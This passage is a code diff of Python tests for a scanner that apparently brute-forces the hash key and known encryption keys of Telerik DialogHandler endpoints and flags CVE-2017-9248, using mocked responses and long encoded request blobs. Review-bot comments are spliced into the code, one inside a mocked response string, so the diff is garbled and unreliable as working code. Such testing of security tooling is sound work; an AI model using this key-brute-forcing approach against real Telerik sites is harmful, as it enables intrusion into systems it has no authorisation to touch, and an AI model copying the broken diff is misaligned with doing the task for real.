pFryVyG%2BesgLUwLWjgGepMMbQgPgi7Lk9TDgl5pO9Sg2%2B%2BCDEKkhmknkE%2FW4zr%2FbE3Qg97NK3hkIC0ajQvysQCsD2G98NREwRp5Yo2qUVqoKsz%2BM5FifnHVivHtbpB%2B0jSdbMPBVqrn6aJutLfJazoTo1MP5RGYQXwBR%2BiE%2BzrvvH3cYwPt7ac%2FkG%2BPEEDYQKPU%2F945Sh5D2ST2TwV1nVjoVq0xMgmM4rJmTTKSABcevdVyK41RiiOgJ1hXMLvtClnaA0rmU1zdilFkAHpka5VW9IKQa4edHYgnnLRdQfQ6YljskVGbbHuSZX9a5AiW9eHYyoNYZno%3D" + 
"%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQ
Q6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvayztxVhLnSpRwg5uIXktoMwJ%2FSaF8x29hA9LIyUqAu4%2FR2hQW%2B4SImPpsXXpqtiGkjfub23eHBh6%2BtPfI7KNBt0Sz%2F3IcUvQk%2BWZYFfPMd8cXJdempaxEs%2BWRlN16p%2BjqhLiVh2A8iaZ4WvdHZmEP7slp3BgAJHjnl7C9sEWeDqCEwe%2FjIDLeJ1X%2FDjBXwflC7CNUtfL5Xw3En%2FArqlvVhUGhwvFy6lQocBfs6%2BLYvOaWiwZ37DX8rkRZlWpkY2rpapUrmnba7Ly%2FoLx924DzkK78M%2BzFL0ra5b1t6Rgv5zuibZAhF47t1EdOxpWIlBlf3zB9gg2M5Rk%2F9IMH%2BzrDHou9o9uO%2BDC6WFddIOuEWc1nrjSenwFkvqgNVdc9CtdiVDWnFLKJh70er5L8AlH7uCb4iXrYljyCSAeyr0DiKz6T8ox10NRGPI6iJbYf%2FIr3IuZE1oJgqcvn7tKhQBOq4jemlZpbeQgPy0FxO0%2BDxeqI%3D" in captured.out ) - print(captured.out) def test_nomatch_PBKDF2(monkeypatch, capsys, mocker): @@ -324,13 +324,21 @@ def generate_keylist_hash(include_machinekeys): mocker.patch.object(Telerik_HashKey, "prepare_keylist", side_effect=generate_keylist_hash) with requests_mock.Mocker() as m: - # Basic Probe Detects Telerik + # Basic Probe Detects Telerik presence m.get( f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", status_code=200, text=partial_dialog_page ) m.post( f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", + additional_matcher=PBKDF2_found_key_matcher, + status_code=200, + text="Please refresh the editor page.
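Review bot: The first of the two added encryption-key assertions is redundant, because `"Found encryption key: [d2a312d9-7af4-43de-be5a-ae717b46cea6]"` is a substring of the `"SUCCESS! Found encryption key: [...]"` string checked on the next line. The removed `"Found matching hashkey!"` check has no replacement in this hunk, so if the tool still reports the hash key on this path, one of the two lines was perhaps meant to cover it; worth confirming against the new output. The parentheses in `assert ("SUCCESS! Found working version: 2018.1.117") in captured.out` are harmless but unlike the neighbouring lines; `assert "SUCCESS! Found working version: 2018.1.117" in captured.out` reads the same as the rest. The enclosing test function begins outside the hunk.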
Error Message:Index was outside the bounds of the array", + ) + + m.post( + f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", + additional_matcher=PBKDF2_found_key_matcher_negative, status_code=200, text="
Error Message:Exception of type 'System.Exception' was thrown.
", ) @@ -345,7 +353,8 @@ def generate_keylist_hash(include_machinekeys): m.post( f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", additional_matcher=PBKDF2_version_probe_matcher_incorrect, - status_code=500, + status_code=200, + text="Could not load file or assembly 'Telerik.Web.UI, Version=1984.5.622, Culture=neutral, PublicKeyToken=121fae78165ba3d4' or one of its dependencies. The located assembly's manifest definition does not match the assembly reference. (Exception from HRESULT: 0x80131040)", ) monkeypatch.setattr( @@ -357,7 +366,7 @@ def generate_keylist_hash(include_machinekeys): print(captured.out) assert "Target is a newer version of Telerik UI" in captured.out assert ( - "Warning: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW" + "WARNING: MachineKeys inclusion mode is enabled, which affects this Telerik version particularly dramatically. Brute Forcing will be VERY SLOW" in captured.out ) print(captured.out) @@ -416,7 +425,8 @@ def test_fullrun_PBKDF1_MS(monkeypatch, capsys, mocker): m.post( f"http://PBKDF1_MS.telerik.com/Telerik.Web.UI.DialogHandler.aspx", additional_matcher=PBKDF1_MS_version_probe_matcher_incorrect, - status_code=500, + status_code=200, + text="Could not load file or assembly 'Telerik.Web.UI, Version=1984.5.622, Culture=neutral, PublicKeyToken=121fae78165ba3d4' or one of its dependencies. The located assembly's manifest definition does not match the assembly reference. (Exception from HRESULT: 0x80131040)", ) monkeypatch.setattr( 
@@ -425,15 +435,15 @@ def test_fullrun_PBKDF1_MS(monkeypatch, capsys, mocker): ) telerik_knownkey.main() captured = capsys.readouterr() + print(captured.out) assert "Target is a valid DialogHandler endpoint. Brute forcing Telerik Hash Key" in captured.out - assert "Found matching hashkey! [YOUR_ENCRYPTION_KEY_TO_GO_HERE]" in captured.out - assert "Found Encryption key! [d2a312d9-7af4-43de-be5a-ae717b46cea6]" in captured.out + assert "Found matching hashkey: [YOUR_ENCRYPTION_KEY_TO_GO_HERE]" in captured.out + assert "Found encryption key: [d2a312d9-7af4-43de-be5a-ae717b46cea6]" in captured.out assert "Found Telerik Version! [2018.1.117]" in captured.out assert ( "gRRgyE4BOGtN%2FLtBxeEeJDuLj%2FUwIG4oBhO5rCDfPjeH10P8Y02mDK3B%2FtsdOIrwILK7XjQiuTlTZMgHckSyb518JPAo6evNlVTPWD5AZX5l4UIUkfdJvq28UHyeBA4eC58PfA6nG7V2Q97Qwqef6cpbM6t88zvE0wJt8uUKji4ZfyBif4du8JgpDzzdSi%2BlWYd3YhzNbbfKVH%2F0sfraIHOsRvwNwrVc0V%2Fnmn%2BGlqm1rheswSONIo7BzKo04RLb232aDuWcluEWDMFdNJpzpdgcq96mWrs9KttFyRjUZ%2FhUi8ZQi0R4GXCrfHRTAYOq%2B2TNdECbAEfmA4n9Pb0BDDGDfghLV6h%2FbLrUaMWZCx6U5zCQfymn96h1t5acGgfxYMCS%2FYS7WRPytc759VdSM2KhGVmuGlupbxVz5gVOWffo5rTDQxwiPhcWYHTJlN%2FawmJfHJsJV0WvTBaW9nEPL0QeeUEu3jc7OPW9CbVufHb7Rfg7RQ%2F6Gjz5TBlzfY32lcFTsyRolWjxU3%2FVBb09tcN2EJGBnjZxpl6eFsYOvexTx0ykt0PCQagdR0DPFLPsdj7kDMrdDhpMDjsqQA0W06ULEtlR8unWsjavyK0%2B8CuTN%2BkuMzFrH10Wvqb5j3SYwANq3pyEuf3OScByrY8NVz7EzX%2BYQb5%2FByHmXi99NCHbO6ZQyHnM%2BPWYwinlnFrU6f%2BvI2ruMl35dZ%2BWWSGnEdv0DVxiedxWgqDlov31JoGaaffpBs8OO3LhtYqIixQPFbjq2wPrEcHPLgM40eYtJfduPI6exc%2BkKlxFGOyB44XjDuC4VHBPmCCFH%2FguBAatG%2FSZU1z%2Fj%2FJ0YDIVedDDdPg2NtQXjjjidSW8ISbfOk1SoLSFz04F9BmmMnPVsg9Dvtbbf%2Bz%2FhudrAo9Ys%2Fa6OzksFXxwQ%2FcSIDYVAsYkRjDMcgRv6erm8bBqgABiSF7SwBLkL75mI18fA3qCxgYDrcXZJYCIbS%2BQg9QiROf7PnRBcrnAg0G2ArfRY5gQE69DA4hvUFuXZvCbVbqQGZs7TrKNqBH40DzPqKFqhBKawuCF84zc08QzWVdbl92rAUl%2FbGi6RYzgx27pPzu7LbYLl4G8a5vtVZjuK7SchY0B7FfMvF3uQA%2FY4G%2FjqDGqGshadxalKPmwfUNbDSaatepav%2Bx4zfzQhn6cV2r8t1qz1TfHypR%2BCaAEVhEa36reVmWrAKXjr0JFOSSAQJTti%2BKhNRhaVPTgVI%2BsX%2F0
pf8Fn0Zvv%2FbPL9C9L1pEAco%2FGIOV9AHNoh5E18zHcmINA2HmoZWha91ONomoIGvWnlM5USb%2FYSrXZuJDsSFFU9oal%2F45NDUNWlNVsXD%2B8RvuVsl1DY7i9iftU%2FtZpskuIldUFYmXWgMWCwk6sQAaARQoQKBEvCL6OV8UcD3bsde0ubcUG9oH140jsAW6Yh7okoKYZlL2xtp4ba7o8CS3R%2FduPuJLFY6fUexkHpvKj1Nn%2B31oQSjRywNhDdNvlczG4Z2LI73TdsZuCKnSPHNF7DNtOxmeGKZl9z9utufWZIb1FetBPy97bOOVKx69nZYTjmfv7hzBuEd5SweBD9QA2WspaycH9H01R4IXXcnrWKHkkaaVS3jDR%2F%2Bll4S0yGKlVT8EiRqLcZVX6mP2C7tmpbTE1tE%2F5ydEXkHMQ4Q75MDhO6F24ahX2rF%2FyfzuAMnR784wtXAM2E3hvVbCzu1rS9Xy1O7uSL%2Fzw1PxRlBZ%2FTwP00bUw22fQfnye%2Fb5s1NmvpWcrSX6tUNlK%2BrCHlfKSxWVhMWiZOqjMq9chUja87UzhcVXYBWZqhfuGsbRIoDQ40P6k7LDTuuzR7UuMU0nPFvGXsfwyu4UQzQppBmjwdQQlpo9GK2XAR7M2Wj5XNB5yZ3n8uMfW%2BktjiC0yW9bo0BVtvvmEOayXYwXyndHauAcJ0HpHnRLtnzNKnTKI3IY%2Fl4kYFS%2BiYUk6n0nd2eVKroYdrMjKZehZmpwmXfU3%2FWpwmt6HK%2FWKAWZzjlEUaN5zDbG%2BtGNxrjYaVvJuDn2uVtmozVU8dbCdz82O6sukqV5QZ86FFImnlZPOKcSHIFq%2F%2B1AdBG%2FUEKZ28aaadpm11H4ovyjAawjFwoWhtDsJB%2F1YbGDIqlKJ40ZOav8gu1Q%2Bv9UtpaQsDfm84FjlzlmwRQn2LF%2FBZLNmAjc8uug0sItSc2bX9d7gR9EWc3KML3PiBecc%2B6LfUkd5WyqHKPP%2FHDETbor16YGv%2Bt3d6KNtQgY3p%2B2Y8kVRCqtngKNzuid%2FXOmNTpwgKgj69id3uo8asDGcs%2B%2FVu5WjbkDNF%2FJlg2TWyTzwpr53wOKmm6tsWwf2FYScCHzXvfWjxHIR9qyGtIOembCqhaK%2Bv7NYDhaI8dAOtvz2su0yzecbzGa65MlwPIyRmv458OLvCMd1BLubANPxC3YfpMHm7x0JllAwNm4K%2BfM73Qkk6jsLwAr28YC1rvMCRONv4Q0sqEpuXfGbS212hv2LeVMq9wrORW353yq2MeRDxFnc2v0oTtVL9D7nlAlBXotJu4rT%2FzhFkH%2Be%2Fbmcbe1sgbaR4BIqrp65Nwq7RjjbB8FX8fi3xA%2BVE68b9DwmAMsub7oVbmI%2B09Wf85hjYjV5fS1xHdKqT6GRTqF9HhkiRxSIDKXzMM7pBXvzwuG%2BOWTVEBOgctSA2alhhyKvUBizsrW6TO%2FSPoX8n%2Fg3qUfufYGrb05PuoeDayC9iZEzmYc%3D" in captured.out ) - print(captured) def test_misctest_PBKDF1_MS(monkeypatch, capsys, mocker): 
@@ -509,11 +519,12 @@ def test_misctest_PBKDF1_MS(monkeypatch, capsys, mocker): ) telerik_knownkey.main() captured = capsys.readouterr() + print(captured.out) assert "Target is a valid DialogHandler endpoint. Brute forcing Telerik Hash Key" in captured.out assert "Found Telerik Version!" not in captured.out - assert "Since we found a valid hash key, we can check for known Telerik Encryption Keys" in captured.out + assert "SUCCESS! Found matching hashkey: [YOUR_ENCRYPTION_KEY_TO_GO_HERE]" in captured.out + assert "Now checking for known Telerik Encryption Keys..." assert "Could not identify encryption key." in captured.out - print(captured.out) def test_nomatch_PBKDF1_MS(monkeypatch, capsys, mocker): @@ -556,7 +567,8 @@ def generate_keylist_hash(include_machinekeys): ) telerik_knownkey.main() captured = capsys.readouterr() - assert "This means it should be vulnerable to CVE-2017-9248!!!" in captured.out + print(captured.out) + assert "Target appears to be a pre-2017 version without hash key (CVE-2017-9248)" in captured.out def test_badoutput_PBKDF1_MS(monkeypatch, capsys, mocker):
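Review bot: The added `assert "Now checking for known Telerik Encryption Keys..."` in test_misctest_PBKDF1_MS can never fail, because a non-empty string literal is always truthy; the `in captured.out` that the neighbouring assertions carry is missing. It should read `assert "Now checking for known Telerik Encryption Keys..." in captured.out`. As written, the test still passes if the tool stops printing that message, so the replacement for the removed "Since we found a valid hash key" check is not enforced.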